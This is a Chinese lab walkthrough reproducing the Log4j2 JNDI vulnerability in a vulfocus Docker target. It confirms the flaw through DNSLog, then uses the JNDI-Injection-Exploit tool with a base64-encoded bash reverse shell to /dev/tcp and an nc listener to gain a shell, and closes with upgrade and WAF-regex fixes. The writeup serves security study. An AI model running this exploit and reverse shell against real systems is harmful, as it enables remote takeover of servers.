log4j2复现

目录

环境搭建

log4j2 DNSLog测试

JNDI注入反弹shell


环境搭建

靶机:Ubuntu  5.4.0-117-generic   192.168.6.183
攻击机:Kali  5.16.0-kali7-amd64  192.168.6.212

靶机:
#首先拉一个docker镜像
docker pull vulfocus/vulfocus
#查看镜像
docker images
#启动
docker run -d -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=172.16.124.129 vulfocus/vulfocus

浏览器中访问目标IP的8081端口: 

查看镜像,将log4j漏洞的镜像拉取下来:

log4j2 DNSLog测试

在首页启动log4j2镜像:

访问此地址:

 

 进行DNSLog验证:点击get subdomain得到一个dns:72lrrx.dnslog.cn

使用bp对http://172.16.124.129:60067/页面抓包:

 修改参数:

 

发到reperter模块查看:

 

 

放包:

 

查看DNSLog页面,点击Refresh Record:

 DNSLog网站收到解析记录,说明这里有log4j2漏洞。

JNDI注入反弹shell

利用JNDI注入工具在攻击机上开启JNDI服务器,在攻击机Kali中安装:

git clone https://github.com/sayers522/JNDI-Injection-Exploit.git

进入目录,使用mvn工具打包:

#未进行安装的话,安装mvn
apt install maven -y
#打包
mvn clean package -DskipTests

会生成一个target文件夹:

 生成payload:

bash -i >& /dev/tcp/192.168.6.212/1234 0>&1

将其进行base64编码:

 

#生成payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYuMjEyLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.6.212"

反弹shell:
监听端口1234:
nc -lvvp 1234

 将payload进行url编码:

 

放包,看是否反弹:

反弹成功。

修复方案

升级到最新版本

在WAF中配置规则,阻断攻击性输入

攻击字符串得特性是 ${jndi:schema://url},通过正则表达式进行匹配,阻断带有上述特征的请求即可。因为应用系统的多样性等原因,直接WAF阻断存在干扰正常业务功能的风险。

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值